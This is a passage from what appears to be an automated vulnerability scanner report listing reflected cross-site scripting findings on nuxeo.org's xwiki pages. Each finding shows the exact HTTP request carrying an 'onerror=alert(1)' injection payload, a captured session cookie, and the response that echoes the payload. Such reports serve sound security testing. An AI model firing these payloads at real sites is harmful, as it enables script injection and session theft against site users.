<a href="http://www.nuxeo.org/xwiki/bin/view/Mainf93c1%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4d9be4736ed/">Mainf93c1<img src=a onerror=alert(1)>4d9be4736ed</a>
...[SNIP]...

1.73. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Dashboard

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210a4"><img%20src%3da%20onerror%3dalert(1)>0659efe6902 was submitted in the REST URL parameter 4. This input was echoed as 210a4"><img src=a onerror=alert(1)>0659efe6902 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main210a4"><img%20src%3da%20onerror%3dalert(1)>0659efe6902/Dashboard HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:49 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12963
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main210a4%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E0659efe6902/Dashboard?format=xar&amp;name=Main210a4"><img src=a onerror=alert(1)>0659efe6902.Dashboard&amp;pages=Main210a4">
...[SNIP]...

1.74. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Dashboard

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b787b"><img%20src%3da%20onerror%3dalert(1)>f9b9ae24085 was submitted in the REST URL parameter 5. This input was echoed as b787b"><img src=a onerror=alert(1)>f9b9ae24085 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Dashboardb787b"><img%20src%3da%20onerror%3dalert(1)>f9b9ae24085 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:09 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12947
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Dashboardb787b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef9b9ae24085?format=xar&amp;name=Main.Dashboardb787b"><img src=a onerror=alert(1)>f9b9ae24085&amp;pages=Main.Dashboardb787b">
...[SNIP]...

1.75. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Dashboard

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97ab6<img%20src%3da%20onerror%3dalert(1)>29fb3ec50ba was submitted in the REST URL parameter 5. This input was echoed as 97ab6<img src=a onerror=alert(1)>29fb3ec50ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Dashboard97ab6<img%20src%3da%20onerror%3dalert(1)>29fb3ec50ba HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12885
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard97ab6%3Cimg+src%3Da+onerror%3Dalert%281%29%3E29fb3ec50ba'>Dashboard97ab6<img src=a onerror=alert(1)>29fb3ec50ba</a>
...[SNIP]...

1.76. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Downloads

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4a8a"><img%20src%3da%20onerror%3dalert(1)>1bb236ad708 was submitted in the REST URL parameter 4. This input was echoed as b4a8a"><img src=a onerror=alert(1)>1bb236ad708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainb4a8a"><img%20src%3da%20onerror%3dalert(1)>1bb236ad708/Downloads HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:17 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12963
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainb4a8a%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E1bb236ad708/Downloads?format=xar&amp;name=Mainb4a8a"><img src=a onerror=alert(1)>1bb236ad708.Downloads&amp;pages=Mainb4a8a">
...[SNIP]...

1.77. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Downloads

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4709<img%20src%3da%20onerror%3dalert(1)>207cbf0fc30 was submitted in the REST URL parameter 4. This input was echoed as b4709<img src=a onerror=alert(1)>207cbf0fc30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainb4709<img%20src%3da%20onerror%3dalert(1)>207cbf0fc30/Downloads HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12897
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Mainb4709%3Cimg+src%3Da+onerror%3Dalert%281%29%3E207cbf0fc30/">Mainb4709<img src=a onerror=alert(1)>207cbf0fc30</a>
...[SNIP]...

1.78. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Downloads

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfcbe"><img%20src%3da%20onerror%3dalert(1)>9b72863cbb6 was submitted in the REST URL parameter 5. This input was echoed as bfcbe"><img src=a onerror=alert(1)>9b72863cbb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Downloadsbfcbe"><img%20src%3da%20onerror%3dalert(1)>9b72863cbb6 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12947
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Downloadsbfcbe%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9b72863cbb6?format=xar&amp;name=Main.Downloadsbfcbe"><img src=a onerror=alert(1)>9b72863cbb6&amp;pages=Main.Downloadsbfcbe">
...[SNIP]...

1.79. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Downloads

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 373b0<img%20src%3da%20onerror%3dalert(1)>9fa509c902d was submitted in the REST URL parameter 5. This input was echoed as 373b0<img src=a onerror=alert(1)>9fa509c902d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Downloads373b0<img%20src%3da%20onerror%3dalert(1)>9fa509c902d HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12885
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Downloads373b0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9fa509c902d'>Downloads373b0<img src=a onerror=alert(1)>9fa509c902d</a>
...[SNIP]...

1.80. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34dd9<img%20src%3da%20onerror%3dalert(1)>4dbb20e4ed3 was submitted in the REST URL parameter 4. This input was echoed as 34dd9<img src=a onerror=alert(1)>4dbb20e4ed3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main34dd9<img%20src%3da%20onerror%3dalert(1)>4dbb20e4ed3/Howto+launch+the+selenium+test+suite HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13258
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main34dd9%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4dbb20e4ed3/">Main34dd9<img src=a onerror=alert(1)>4dbb20e4ed3</a>
...[SNIP]...

1.81. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adc0c"><img%20src%3da%20onerror%3dalert(1)>ff8c6314af6 was submitted in the REST URL parameter 4. This input was echoed as adc0c"><img src=a onerror=alert(1)>ff8c6314af6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainadc0c"><img%20src%3da%20onerror%3dalert(1)>ff8c6314af6/Howto+launch+the+selenium+test+suite HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:34 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13324
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainadc0c%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eff8c6314af6/Howto+launch+the+selenium+test+suite?format=xar&amp;name=Mainadc0c"><img src=a onerror=alert(1)>ff8c6314af6.Howto launch the selenium test suite&amp;pages=Mainadc0c">
...[SNIP]...

1.82. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9017"><img%20src%3da%20onerror%3dalert(1)>b19d426ad36 was submitted in the REST URL parameter 5. This input was echoed as d9017"><img src=a onerror=alert(1)>b19d426ad36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suited9017"><img%20src%3da%20onerror%3dalert(1)>b19d426ad36 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13308
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
tp://www.nuxeo.org/xwiki/bin/export/Main/Howto+launch+the+selenium+test+suited9017%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eb19d426ad36?format=xar&amp;name=Main.Howto launch the selenium test suited9017"><img src=a onerror=alert(1)>b19d426ad36&amp;pages=Main.Howto launch the selenium test suited9017">
...[SNIP]...

1.83. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2b2fb<img%20src%3da%20onerror%3dalert(1)>5aad0972571 was submitted in the REST URL parameter 5. This input was echoed as 2b2fb<img src=a onerror=alert(1)>5aad0972571 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite2b2fb<img%20src%3da%20onerror%3dalert(1)>5aad0972571 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:37 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13246
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite2b2fb%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5aad0972571'>Howto launch the selenium test suite2b2fb<img src=a onerror=alert(1)>5aad0972571</a>
...[SNIP]...

1.84. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/JCRMigration

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 601dd<img%20src%3da%20onerror%3dalert(1)>5ae4cf92fe7 was submitted in the REST URL parameter 4. This input was echoed as 601dd<img src=a onerror=alert(1)>5ae4cf92fe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main601dd<img%20src%3da%20onerror%3dalert(1)>5ae4cf92fe7/JCRMigration HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:31 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12936
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main601dd%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5ae4cf92fe7/">Main601dd<img src=a onerror=alert(1)>5ae4cf92fe7</a>
...[SNIP]...

1.85. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/JCRMigration

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69a0c"><img%20src%3da%20onerror%3dalert(1)>c19e02784b was submitted in the REST URL parameter 4. This input was echoed as 69a0c"><img src=a onerror=alert(1)>c19e02784b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main69a0c"><img%20src%3da%20onerror%3dalert(1)>c19e02784b/JCRMigration HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
